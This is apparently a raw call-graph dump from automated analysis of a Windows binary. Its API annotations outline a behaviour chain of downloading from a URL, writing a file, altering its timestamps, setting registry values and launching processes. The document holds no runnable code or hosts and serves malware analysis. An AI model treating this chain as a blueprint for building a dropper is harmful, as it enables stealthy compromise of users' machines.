11163->11164 11165 401888 11164->11165 11166 401a63 11165->11166 11167 401893 GetProcessHeap HeapAlloc SHGetSpecialFolderPathW 11165->11167 11169 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11166->11169 11167->11166 11168 4018c4 11167->11168 11171 406dd0 29 API calls 11168->11171 11170 401a70 11169->11170 11170->10747 11172 4018d8 11171->11172 11173 4018fb CallUnexpected 11172->11173 11174 406120 27 API calls 11172->11174 11173->11166 11175 40197d GetProcessHeap HeapAlloc 11173->11175 11176 406120 27 API calls 11173->11176 11177 4069e0 71 API calls 11173->11177 11178 4019e6 CreateProcessW 11173->11178 11174->11173 11175->11173 11176->11175 11177->11173 11179 401a24 CloseHandle CloseHandle 11178->11179 11180 401a3c GetProcessHeap HeapFree 11178->11180 11179->11180 11180->11173 11182 402576 ShellExecuteW 11181->11182 11182->11182 11183 40258e GetProcessHeap HeapFree GetProcessHeap HeapFree ExitProcess 11182->11183 11185 409c88 11184->11185 11185->11125 11185->11185 11187 4025f5 InternetOpenUrlW 11186->11187 11188 4026f9 11186->11188 11190 4026ed InternetCloseHandle 11187->11190 11195 40260f __InternalCxxFrameHandler 11187->11195 11189 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11188->11189 11191 402707 11189->11191 11190->11188 11191->11156 11192 402630 InternetReadFile 11193 402665 GetProcessHeap RtlReAllocateHeap 11192->11193 11194 402658 GetProcessHeap HeapAlloc 11192->11194 11193->11195 11194->11195 11195->11192 11196 4026a7 GetProcessHeap RtlAllocateHeap 11195->11196 11197 409c70 __InternalCxxFrameHandler 11196->11197 11198 4026cc GetProcessHeap RtlFreeHeap InternetCloseHandle 11197->11198 11198->11190 11329 407172 11199->11329 11201 406e07 CallUnexpected 11202 406e1c GetCurrentDirectoryW 11201->11202 11203 406e66 11202->11203 11203->11203 11204 406e89 11203->11204 11205 407172 16 API calls 11204->11205 11206 406e9b 11205->11206 11339 405360 11206->11339 11208 406ec5 11209 407172 16 API calls 11208->11209 11210 406ecb 11208->11210 11211 406f42 11209->11211 11210->11146 11211->11146 11213 406a44 11212->11213 11222 406a01 11212->11222 11214 406a65 11213->11214 11215 406a7d 11213->11215 11217 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11214->11217 11216 406ab8 11215->11216 11218 406a86 11215->11218 11219 406b13 11216->11219 11227 406aa8 11216->11227 11220 406a77 11217->11220 11225 405540 8 API calls 11218->11225 11223 406120 27 API calls 11219->11223 11220->11155 11221 406a20 11228 40c52b ___std_exception_copy 14 API calls 11221->11228 11222->11213 11222->11221 11224 40c52b ___std_exception_copy 14 API calls 11222->11224 11226 406b22 11223->11226 11224->11221 11225->11227 11229 406b32 11226->11229 11230 406b6e 11226->11230 11227->11216 11231 405540 8 API calls 11227->11231 11228->11213 11232 406830 66 API calls 11229->11232 11233 406bb7 11230->11233 11235 406dc4 11230->11235 11236 406bd4 11230->11236 11231->11227 11234 406b59 11232->11234 11601 4027b0 11233->11601 11237 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11234->11237 11605 407097 11235->11605 11236->11233 11238 406c25 11236->11238 11239 406b68 11237->11239 11242 4027b0 45 API calls 11238->11242 11239->11155 11243 406c20 11242->11243 11485 406830 11243->11485 11246 406c50 CreateFileW 11247 406c93 11246->11247 11248 406c7b 11246->11248 11552 405b70 11247->11552 11249 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11248->11249 11251 406c8d 11249->11251 11251->11155 11253 406ca0 11254 406ce9 WriteFile 11253->11254 11258 406d15 11253->11258 11570 405d40 11253->11570 11254->11253 11254->11258 11255 406d65 11256 406da1 CloseHandle 11255->11256 11257 406d73 SetFileTime CloseHandle 11255->11257 11259 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11256->11259 11257->11256 11258->11255 11260 406d41 11258->11260 11262 40c52b ___std_exception_copy 14 API calls 11258->11262 11261 406dbe 11259->11261 11263 40c52b ___std_exception_copy 14 API calls 11260->11263 11261->11155 11262->11260 11263->11255 11265 401e66 GetProcessHeap HeapAlloc GetSystemDirectoryW 11264->11265 11266 401aa6 RegOpenKeyW lstrlenW RegSetValueExW RegCloseKey 11264->11266 11267 402485 GetProcessHeap HeapFree 11265->11267 11268 401e9c GetProcessHeap HeapAlloc 11265->11268 11274 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11266->11274 11269 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11267->11269 11271 402020 wsprintfW GetProcessHeap HeapAlloc 11268->11271 11273 40249f 11269->11273 11275 402420 6 API calls 11271->11275 11273->11149 11276 401e62 11274->11276 11275->11267 11276->11149 11279 406813 11278->11279 11280 40614d 11278->11280 11282 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11279->11282 11280->11279 11281 406158 11280->11281 11283 406165 11281->11283 11285 4060b0 14 API calls 11281->11285 11284 406825 11282->11284 11286 406177 11283->11286 11287 40619d 11283->11287 11284->11156 11285->11283 11288 4061a2 11286->11288 11290 40617c 11286->11290 11287->11288 11289 4061f8 11287->11289 11292 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11288->11292 11295 406203 11289->11295 11300 406235 11289->11300 11291 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11290->11291 11293 406197 11291->11293 11294 4061f2 11292->11294 11293->11156 11294->11156 11298 405540 8 API calls 11295->11298 11296 406293 11297 405540 8 API calls 11296->11297 11299 4062b1 11297->11299 11302 406225 11298->11302 11301 405910 7 API calls 11299->11301 11300->11296 11300->11302 11303 4062cf 11301->11303 11302->11300 11304 405540 8 API calls 11302->11304 11305 4062d6 11303->11305 11306 4062ee 11303->11306 11304->11302 11307 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11305->11307 11309 4062fd SetFilePointer 11306->11309 11311 406316 11306->11311 11315 406356 11306->11315 11308 4062e8 11307->11308 11308->11156 11309->11311 11310 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11312 406371 11310->11312 11313 404f30 6 API calls 11311->11313 11312->11156 11314 40634b 11313->11314 11314->11315 11316 406377 MultiByteToWideChar 11314->11316 11315->11310 11317 4063a6 11316->11317 11318 406535 SystemTimeToFileTime LocalFileTimeToFileTime 11317->11318 11320 40663e 11318->11320 11319 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11321 40680d 11319->11321 11320->11319 11321->11156 11323 406f68 11322->11323 11324 406f69 IsProcessorFeaturePresent 11322->11324 11323->11135 11326 406fb2 11324->11326 11944 406f73 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11326->11944 11328 407095 11328->11135 11332 407177 11329->11332 11331 407191 11331->11201 11332->11331 11333 40c57b _unexpected 2 API calls 11332->11333 11335 407193 11332->11335 11369 40c546 11332->11369 11333->11332 11334 4074f5 11336 408720 CallUnexpected RaiseException 11334->11336 11335->11334 11376 408720 11335->11376 11338 407512 11336->11338 11338->11201 11340 405376 CallUnexpected 11339->11340 11345 40551d 11339->11345 11379 405180 11340->11379 11342 405393 11343 40550e 11342->11343 11346 4053c2 11342->11346 11347 4053ad SetFilePointer 11342->11347 11344 405514 CloseHandle 11343->11344 11343->11345 11344->11345 11345->11208 11394 4050e0 11346->11394 11347->11346 11352 405080 6 API calls 11353 4053f9 11352->11353 11353->11343 11354 405080 6 API calls 11353->11354 11355 40540e 11354->11355 11355->11343 11356 405080 6 API calls 11355->11356 11357 405423 11356->11357 11357->11343 11358 4050e0 6 API calls 11357->11358 11359 405458 11358->11359 11359->11343 11360 4050e0 6 API calls 11359->11360 11361 40546a 11360->11361 11361->11343 11362 405080 6 API calls 11361->11362 11363 40547f 11362->11363 11363->11343 11364 405499 11363->11364 11365 40c546 ___std_exception_copy 15 API calls 11364->11365 11366 4054c7 11365->11366 11408 405540 11366->11408 11368 4054fa 11368->11208 11375 40dc7f _unexpected 11369->11375 11370 40dcbd 11371 40dc32 ___std_exception_copy 14 API calls 11370->11371 11373 40dcbb 11371->11373 11372 40dca8 RtlAllocateHeap 11372->11373 11372->11375 11373->11332 11374 40c57b _unexpected 2 API calls 11374->11375 11375->11370 11375->11372 11375->11374 11377 408767 RaiseException 11376->11377 11378 40873a 11376->11378 11377->11334 11378->11377 11383 4051a6 11379->11383 11380 405212 11381 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11380->11381 11382 405222 11381->11382 11382->11342 11383->11380 11384 40c546 ___std_exception_copy 15 API calls 11383->11384 11385 405206 11384->11385 11385->11380 11393 405226 __InternalCxxFrameHandler 11385->11393 11386 405339 11465 40c52b 11386->11465 11389 40527a SetFilePointer 11389->11393 11390 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11392 405352 11390->11392 11391 40529f ReadFile 11391->11393 11392->11342 11393->11386 11393->11389 11393->11391 11468 404fd0 11394->11468 11396 4050f9 11397 404fd0 6 API calls 11396->11397 11399 40510f 11396->11399 11397->11399 11398 40512a 11401 405143 11398->11401 11402 404fd0 6 API calls 11398->11402 11399->11398 11400 404fd0 6 API calls 11399->11400 11400->11398 11401->11343 11403 405080 11401->11403 11402->11401 11404 404fd0 6 API calls 11403->11404 11405 405095 11404->11405 11406 4050ab 11405->11406 11407 404fd0 6 API calls 11405->11407 11406->11343 11406->11352 11407->11406 11409 405554 11408->11409 11410 40555e 11408->11410 11409->11368 11411 405586 11410->11411 11412 405571 SetFilePointer 11410->11412 11413 405593 11410->11413 11414 4050e0 6 API calls 11411->11414 11412->11411 11415 404fd0 6 API calls 11413->11415 11414->11413 11416 4055b7 11415->11416 11417 4055cb 11416->11417 11418 404fd0 6 API calls 11416->11418 11419 404fd0 6 API calls 11417->11419 11418->11417 11420 4055f3 11419->11420 11421 405607 11420->11421 11422 404fd0 6 API calls 11420->11422 11423 404fd0 6 API calls 11421->11423 11422->11421 11424 40562f 11423->11424 11425 405643 11424->11425 11426 404fd0 6 API calls 11424->11426 11427 404fd0 6 API calls 11425->11427 11426->11425 11428 40566b 11427->11428 11429 40567f 11428->11429 11430 404fd0 6 API calls 11428->11430 11431 4050e0 6 API calls 11429->11431 11430->11429 11432 4056a5 11431->11432 11433 4050e0 6 API calls 11432->11433 11434 4056fd 11433->11434 11435 4050e0 6 API calls 11434->11435 11436 40570c 11435->11436 11437 4050e0 6 API calls 11436->11437 11438 40571b 11437->11438 11439 404fd0 6 API calls 11438->11439 11440 40572c 11439->11440 11441 404fd0 6 API calls 11440->11441 11442 405740 11440->11442 11441->11442 11443 404fd0 6 API calls 11442->11443 11444 405768 11443->11444 11445 40577c 11444->11445 11446 404fd0 6 API calls 11444->11446 11447 404fd0 6 API calls 11445->11447 11446->11445 11448 4057a4 11447->11448 11449 4057b8 11448->11449 11450 404fd0 6 API calls 11448->11450 11451 404fd0 6 API calls 11449->11451 11450->11449 11452 4057e0 11451->11452 11453 4057f4 11452->11453 11454 404fd0 6 API calls 11452->11454 11455 404fd0 6 API calls 11453->11455 11454->11453 11456 40581c 11455->11456 11457 405830 11456->11457 11458 404fd0 6 API calls 11456->11458 11459 4050e0 6 API calls 11457->11459 11458->11457 11460 405856 11459->11460 11461 4050e0 6 API calls 11460->11461 11463 40586a 11461->11463 11462 40586e 11462->11368 11463->11462 11477 404f30 11463->11477 11466 40dc45 __freea 14 API calls 11465->11466 11467 40533f 11466->11467 11467->11390 11469 404ff4 ReadFile 11468->11469 11471 40500c __InternalCxxFrameHandler 11468->11471 11469->11471 11470 405047 11472 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11470->11472 11471->11470 11473 40506b 11471->11473 11474 40505c 11472->11474 11475 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11473->11475 11474->11396 11476 40507b 11475->11476 11476->11396 11478 404f5b ReadFile 11477->11478 11480 404f8c __InternalCxxFrameHandler 11477->11480 11479 404f70 11478->11479 11481 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11479->11481 11482 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11480->11482 11483 404f88 11481->11483 11484 404fc6 11482->11484 11483->11462 11484->11462 11490 4068d1 __InternalCxxFrameHandler 11485->11490 11491 406851 11485->11491 11486 4069c1 11487 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11486->11487 11488 4069cd 11487->11488 11488->11246 11489 4068b0 GetFileAttributesW 11489->11490 11492 4068c2 CreateDirectoryW 11489->11492 11490->11486 11493 4069d1 11490->11493 11496 40693d 11490->11496 11497 406926 11490->11497 11491->11489 11491->11493 11494 4068a6 11491->11494 11492->11490 11495 407097 5 API calls 11493->11495 11494->11489 11504 4069d6 11495->11504 11499 406997 GetFileAttributesW 11496->11499 11498 406830 57 API calls 11497->11498 11498->11496 11499->11486 11501 4069b2 CreateDirectoryW 11499->11501 11500 406a44 11502 406a65 11500->11502 11503 406a7d 11500->11503 11501->11486 11505 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11502->11505 11506 406a86 11503->11506 11515 406ab8 11503->11515 11504->11500 11509 406a20 11504->11509 11511 40c52b ___std_exception_copy 14 API calls 11504->11511 11508 406a77 11505->11508 11512 405540 8 API calls 11506->11512 11507 406b13 11510 406120 27 API calls 11507->11510 11508->11246 11514 40c52b ___std_exception_copy 14 API calls 11509->11514 11513 406b22 11510->11513 11511->11509 11516 406aa8 11512->11516 11518 406b32 11513->11518 11520 406b6e 11513->11520 11514->11500 11515->11507 11515->11516 11516->11515 11517 405540 8 API calls 11516->11517 11517->11516 11519 406830 57 API calls 11518->11519 11522 406b59 11519->11522 11521 406bb7 11520->11521 11523 406dc4 11520->11523 11524 406bd4 11520->11524 11528 4027b0 45 API calls 11521->11528 11525 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11522->11525 11529 407097 5 API calls 11523->11529 11524->11521 11526 406c25 11524->11526 11527 406b68 11525->11527 11530 4027b0 45 API calls 11526->11530 11527->11246 11531 406c20 11528->11531 11532 406dc9 11529->11532 11530->11531 11533 406830 57 API calls 11531->11533 11534 406c50 CreateFileW 11533->11534 11535 406c93 11534->11535 11536 406c7b 11534->11536 11538 405b70 22 API calls 11535->11538 11537 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11536->11537 11539 406c8d 11537->11539 11541 406ca0 11538->11541 11539->11246 11540 405d40 7 API calls 11540->11541 11541->11540 11542 406ce9 WriteFile 11541->11542 11546 406d15 11541->11546 11542->11541 11542->11546 11543 406d65 11544 406da1 CloseHandle 11543->11544 11545 406d73 SetFileTime CloseHandle 11543->11545 11547 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11544->11547 11545->11544 11546->11543 11548 406d41 11546->11548 11550 40c52b ___std_exception_copy 14 API calls 11546->11550 11549 406dbe 11547->11549 11551 40c52b ___std_exception_copy 14 API calls 11548->11551 11549->11246 11550->11548 11551->11543 11553 405b84 11552->11553 11554 405d2a 11552->11554 11553->11554 11555 405b99 11553->11555 11644 4060b0 11553->11644 11554->11253 11608 405910 11555->11608 11558 405bab 11559 405bb2 11558->11559 11560 40c546 ___std_exception_copy 15 API calls 11558->11560 11559->11253 11561 405bc8 11560->11561 11562 405bfd 11561->11562 11563 40c546 ___std_exception_copy 15 API calls 11561->11563 11562->11253 11564 405bdb 11563->11564 11565 405bf7 11564->11565 11566 405c0c 11564->11566 11567 40c52b ___std_exception_copy 14 API calls 11565->11567 11569 405c59 11566->11569 11651 4048b0 11566->11651 11567->11562 11569->11253 11571 405d69 11570->11571 11572 406098 11571->11572 11573 405d7f 11571->11573 11574 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11572->11574 11575 405d83 11573->11575 11576 405d99 11573->11576 11577 4060aa 11574->11577 11578 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11575->11578 11579 405da0 11576->11579 11596 405db1 __InternalCxxFrameHandler 11576->11596 11577->11253 11580 405d95 11578->11580 11581 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11579->11581 11580->11253 11582 405dad 11581->11582 11582->11253 11583 40607b 11584 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11583->11584 11585 406094 11584->11585 11585->11253 11587 40603a 11591 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11587->11591 11588 405e0f SetFilePointer 11588->11596 11589 40604e 11592 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11589->11592 11590 405e34 ReadFile 11593 405e4a 11590->11593 11594 40604a 11591->11594 11595 406060 11592->11595 11593->11596 11594->11253 11595->11253 11596->11583 11596->11587 11596->11588 11596->11589 11596->11590 11597 406064 11596->11597 11598 406068 11596->11598 11664 404b40 11596->11664 11597->11583 11597->11598 11599 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11598->11599 11600 406077 11599->11600 11600->11253 11602 4027cd 11601->11602 11672 40c4ea 11602->11672 11939 4070a3 IsProcessorFeaturePresent 11605->11939 11609 40593a 11608->11609 11610 40595c 11608->11610 11611 405940 SetFilePointer 11609->11611 11612 405953 11609->11612 11613 4050e0 6 API calls 11610->11613 11611->11610 11612->11558 11614 405969 11613->11614 11616 404fd0 6 API calls 11614->11616 11617 40598e 11616->11617 11618 40599c 11617->11618 11619 404fd0 6 API calls 11617->11619 11620 404fd0 6 API calls 11618->11620 11619->11618 11621 4059b2 11620->11621 11622 4059c4 11621->11622 11623 404fd0 6 API calls 11621->11623 11624 404fd0 6 API calls 11622->11624 11623->11622 11625 4059e2 11624->11625 11626 404fd0 6 API calls 11625->11626 11630 4059f7 11625->11630 11626->11630 11627 4050e0 6 API calls 11628 405a40 11627->11628 11629 4050e0 6 API calls 11628->11629 11631 405a54 11629->11631 11630->11627 11632 4050e0 6 API calls 11631->11632 11633 405a7e 11632->11633 11634 4050e0 6 API calls 11633->11634 11635 405aa8 11634->11635 11636 404fd0 6 API calls 11635->11636 11637 405ad4 11636->11637 11638 405ae8 11637->11638 11639 404fd0 6 API calls 11637->11639 11640 404fd0 6 API calls 11638->11640 11639->11638 11641 405b20 11640->11641 11642 405b35 11641->11642 11643 404fd0 6 API calls 11641->11643 11642->11558 11643->11642 11645 406115 11644->11645 11646 4060bb 11644->11646 11645->11555 11646->11645 11647 4060e1 11646->11647 11648 40c52b ___std_exception_copy 14 API calls 11646->11648 11649 40c52b ___std_exception_copy 14 API calls 11647->11649 11648->11647 11650 406105 11649->11650 11650->11555 11652 4048b7 11651->11652 11653 4048bc CallUnexpected 11651->11653 11652->11569 11654 40490f 11653->11654 11655 4049a4 11653->11655 11657 4049dc 11653->11657 11659 404a34 11653->11659 11654->11569 11655->11654 11656 40c52b ___std_exception_copy 14 API calls 11655->11656 11656->11654 11657->11655 11658 40c52b ___std_exception_copy 14 API calls 11657->11658 11658->11655 11660 404ac7 11659->11660 11661 40c52b ___std_exception_copy 14 API calls 11659->11661 11662 404aed 11659->11662 11660->11662 11663 40c52b ___std_exception_copy 14 API calls 11660->11663 11661->11660 11662->11569 11663->11662 11666 404dd9 11664->11666 11667 404b51 11664->11667 11666->11596 11667->11666 11668 402fb0 11667->11668 11670 402fe5 __InternalCxxFrameHandler 11668->11670 11669 403c20 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11669->11670 11670->11669 11671 403996 11670->11671 11671->11667 11673 40c4fe ___std_exception_copy 11672->11673 11678 40a27b 11673->11678 11676 40b4a0 ___std_exception_copy 41 API calls 11677 4027d7 11676->11677 11677->11243 11679 40a2a7 11678->11679 11680 40a2ca 11678->11680 11681 40daf7 ___std_exception_copy 29 API calls 11679->11681 11680->11679 11684 40a2d2 11680->11684 11682 40a2bf 11681->11682 11683 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11682->11683 11685 40a3fc 11683->11685 11689 40b736 11684->11689 11685->11676 11702 40c426 11689->11702 11692 40b756 11693 40daf7 ___std_exception_copy 29 API calls 11692->11693 11694 40a353 11693->11694 11699 40b4dc 11694->11699 11697 40b77d 11697->11694 11706 40b6bc 11697->11706 11709 40b972 11697->11709 11750 40bafc 11697->11750 11700 40dc45 __freea 14 API calls 11699->11700 11701 40b4ec 11700->11701 11701->11682 11703 40b74b 11702->11703 11704 40c431 11702->11704 11703->11692 11703->11694 11703->11697 11705 40daf7 ___std_exception_copy 29 API calls 11704->11705 11705->11703 11786 40a5b4 11706->11786 11708 40b6f9 11708->11697 11710 40b980 11709->11710 11711 40b998 11709->11711 11712 40b9d9 11710->11712 11713 40bb94 11710->11713 11714 40bb2a 11710->11714 11711->11712 11715 40daf7 ___std_exception_copy 29 API calls 11711->11715 11712->11697 11716 40bbd3 11713->11716 11717 40bb99 11713->11717 11718 40bb30 11714->11718 11719 40bbbc 11714->11719 11720 40b9cd 11715->11720 11721 40bbf2 11716->11721 11722 40bbd8 11716->11722 11723 40bbca 11717->11723 11724 40bb9b 11717->11724 11725 40bb61 11718->11725 11726 40bb35 11718->11726 11836 40ad37 11719->11836 11720->11697 11851 40c298 11721->11851 11728 40bbe9 11722->11728 11731 40bbdd 11722->11731 11843 40c27b 11723->11843 11727 40bb43 11724->11727 11739 40bbaa 11724->11739 11732 40bb3b 11725->11732 11735 40bb89 11725->11735 11726->11728 11726->11732 11737 40bbfd 11727->11737 11809 40bfa7 11727->11809 11847 40c2ae 11728->11847 11731->11719 11731->11735 11732->11727 11740 40bb6e 11732->11740 11747 40bb5c 11732->11747 11735->11737 11825 40aec9 11735->11825 11743 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11737->11743 11739->11719 11741 40bbae 11739->11741 11740->11737 11819 40c14e 11740->11819 11741->11737 11832 40c1f6 11741->11832 11745 40beee 11743->11745 11745->11697 11746 40bddd 11746->11737 11861 40ea92 11746->11861 11747->11737 11747->11746 11854 40c3b0 11747->11854 11751 40bb94 11750->11751 11752 40bb2a 11750->11752 11753 40bbd3 11751->11753 11754 40bb99 11751->11754 11755 40bb30 11752->11755 11756 40bbbc 11752->11756 11757 40bbf2 11753->11757 11758 40bbd8 11753->11758 11759 40bbca 11754->11759 11760 40bb9b 11754->11760 11761 40bb61 11755->11761 11762 40bb35 11755->11762 11763 40ad37 30 API calls 11756->11763 11768 40c298 30 API calls 11757->11768 11765 40bbe9 11758->11765 11766 40bbdd 11758->11766 11764 40c27b 30 API calls 11759->11764 11767 40bb43 11760->11767 11775 40bbaa 11760->11775 11769 40bb3b 11761->11769 11771 40bb89 11761->11771 11762->11765 11762->11769 11782 40bb5c 11763->11782 11764->11782 11772 40c2ae 41 API calls 11765->11772 11766->11756 11766->11771 11770 40bfa7 44 API calls 11767->11770 11784 40bbfd 11767->11784 11768->11782 11769->11767 11773 40bb6e 11769->11773 11769->11782 11770->11782 11774 40aec9 30 API calls 11771->11774 11771->11784 11772->11782 11777 40c14e 42 API calls 11773->11777 11773->11784 11774->11782 11775->11756 11776 40bbae 11775->11776 11780 40c1f6 29 API calls 11776->11780 11776->11784 11777->11782 11778 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11779 40beee 11778->11779 11779->11697 11780->11782 11781 40c3b0 ___scrt_uninitialize_crt 41 API calls 11785 40bddd 11781->11785 11782->11781 11782->11784 11782->11785 11783 40ea92 ___scrt_uninitialize_crt 42 API calls 11783->11785 11784->11778 11785->11783 11785->11784 11796 40c40b 11786->11796 11788 40a5ca 11789 40a5df 11788->11789 11791 40a612 11788->11791 11795 40a5fa 11788->11795 11790 40daf7 ___std_exception_copy 29 API calls 11789->11790 11790->11795 11794 40a911 11791->11794 11803 40c377 11791->11803 11792 40c377 41 API calls 11792->11795 11794->11792 11795->11708 11797 40c410 11796->11797 11798 40c423 11796->11798 11799 40dc32 ___std_exception_copy 14 API calls 11797->11799 11798->11788 11800 40c415 11799->11800 11801 40db74 ___std_exception_copy 41 API calls 11800->11801 11802 40c420 11801->11802 11802->11788 11804 40c3a1 11803->11804 11805 40c38c 11803->11805 11804->11794 11805->11804 11806 40dc32 ___std_exception_copy 14 API calls 11805->11806 11807 40c396 11806->11807 11808 40db74 ___std_exception_copy 41 API calls 11807->11808 11808->11804 11810 40bfc8 11809->11810 11873 40a42f 11810->11873 11812 40c00a 11884 40e911 11812->11884 11815 40c0c0 11817 40c3b0 ___scrt_uninitialize_crt 41 API calls 11815->11817 11818 40c0fc 11815->11818 11816 40c3b0 ___scrt_uninitialize_crt 41 API calls 11816->11815 11817->11818 11818->11747 11820 40c17b 11819->11820 11821 40c197 11820->11821 11822 40c3b0 ___scrt_uninitialize_crt 41 API calls 11820->11822 11823 40c1b8 11820->11823 11824 40ea92 ___scrt_uninitialize_crt 42 API calls 11821->11824 11822->11821 11823->11747 11824->11823 11826 40aede 11825->11826 11827 40af00 11826->11827 11829 40af27 11826->11829 11828 40daf7 ___std_exception_copy 29 API calls 11827->11828 11831 40af1d 11828->11831 11829->11831 11903 40a4b0 11829->11903 11831->11747 11835 40c20c 11832->11835 11833 40daf7 ___std_exception_copy 29 API calls 11834 40c22d 11833->11834 11834->11747 11835->11833 11835->11834 11837 40ad4c 11836->11837 11838 40ad6e 11837->11838 11840 40ad95 11837->11840 11839 40daf7 ___std_exception_copy 29 API calls 11838->11839 11841 40ad8b 11839->11841 11840->11841 11842 40a4b0 15 API calls 11840->11842 11841->11747 11842->11841 11844 40c287 11843->11844 11914 40aba5 11844->11914 11846 40c297 11846->11747 11848 40c2cb 11847->11848 11850 40c2e9 11848->11850 11921 40c322 11848->11921 11850->11747 11852 40aec9 30 API calls 11851->11852 11853 40c2ad 11852->11853 11853->11747 11855 40b660 ___std_exception_copy 41 API calls 11854->11855 11856 40c3c0 11855->11856 11925 40deaa 11856->11925 11862 40eab6 11861->11862 11863 40eaa6 11861->11863 11862->11746 11863->11862 11864 40eadb 11863->11864 11867 40c3b0 ___scrt_uninitialize_crt 41 API calls 11863->11867 11865 40eaec 11864->11865 11866 40eb0f 11864->11866 11933 413e0c 11865->11933 11866->11862 11869 40eb37 11866->11869 11870 40eb8b 11866->11870 11867->11864 11869->11862 11936 41059a 11869->11936 11871 41059a ___scrt_uninitialize_crt MultiByteToWideChar 11870->11871 11871->11862 11874 40a456 11873->11874 11883 40a444 11873->11883 11875 40dc7f 15 API calls 11874->11875 11874->11883 11876 40a47a 11875->11876 11877 40a482 11876->11877 11878 40a48d 11876->11878 11879 40dc45 __freea 14 API calls 11877->11879 11880 40b4f6 14 API calls 11878->11880 11879->11883 11881 40a498 11880->11881 11882 40dc45 __freea 14 API calls 11881->11882 11882->11883 11883->11812 11885 40e946 11884->11885 11888 40e922 11884->11888 11887 40e979 11885->11887 11885->11888 11886 40daf7 ___std_exception_copy 29 API calls 11897 40c09d 11886->11897 11889 40e9b2 11887->11889 11891 40e9e1 11887->11891 11888->11886 11894 40e7b5 41 API calls 11889->11894 11890 40ea0a 11895 40ea71 11890->11895 11896 40ea37 11890->11896 11891->11890 11892 40ea0f 11891->11892 11893 40e03e 43 API calls 11892->11893 11893->11897 11894->11897 11900 40e36b 43 API calls 11895->11900 11898 40ea57 11896->11898 11899 40ea3c 11896->11899 11897->11815 11897->11816 11902 40e562 43 API calls 11898->11902 11901 40e6e6 43 API calls 11899->11901 11900->11897 11901->11897 11902->11897 11904 40a4d7 11903->11904 11905 40a4c5 11903->11905 11904->11905 11906 40dc7f 15 API calls 11904->11906 11905->11831 11907 40a4fc 11906->11907 11908 40a504 11907->11908 11909 40a50f 11907->11909 11910 40dc45 __freea 14 API calls 11908->11910 11911 40b4f6 14 API calls 11909->11911 11910->11905 11912 40a51a 11911->11912 11913 40dc45 __freea 14 API calls 11912->11913 11913->11905 11915 40abba 11914->11915 11916 40abdc 11915->11916 11918 40ac03 11915->11918 11917 40daf7 ___std_exception_copy 29 API calls 11916->11917 11920 40abf9 11917->11920 11919 40a4b0 15 API calls 11918->11919 11918->11920 11919->11920 11920->11846 11922 40c335 11921->11922 11923 40c33c 11921->11923 11924 40c3b0 ___scrt_uninitialize_crt 41 API calls 11922->11924 11923->11850 11924->11923 11926 40dec1 11925->11926 11927 40c3dd 11925->11927 11926->11927 11928 4110de ___scrt_uninitialize_crt 41 API calls 11926->11928 11929 40df08 11927->11929 11928->11927 11930 40c3ea 11929->11930 11931 40df1f 11929->11931 11930->11746 11931->11930 11932 410250 ___scrt_uninitialize_crt 41 API calls 11931->11932 11932->11930 11934 415f3f ___scrt_uninitialize_crt 5 API calls 11933->11934 11935 413e27 11934->11935 11935->11862 11937 410502 ___scrt_uninitialize_crt 11936->11937 11938 4105b6 MultiByteToWideChar 11937->11938 11938->11862 11940 4070b8 11939->11940 11943 406f73 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11940->11943 11942 406dc9 11943->11942 11944->11328 11946 40f091 11945->11946 11947 40f097 11945->11947 11949 4113f1 _unexpected 6 API calls 11946->11949 11948 411430 _unexpected 6 API calls 11947->11948 11951 40f09b SetLastError 11947->11951 11950 40f0b3 11948->11950 11949->11947 11950->11951 11953 40d8f2 _unexpected 14 API calls 11950->11953 11955 40f130 11951->11955 11956 40d772 11951->11956 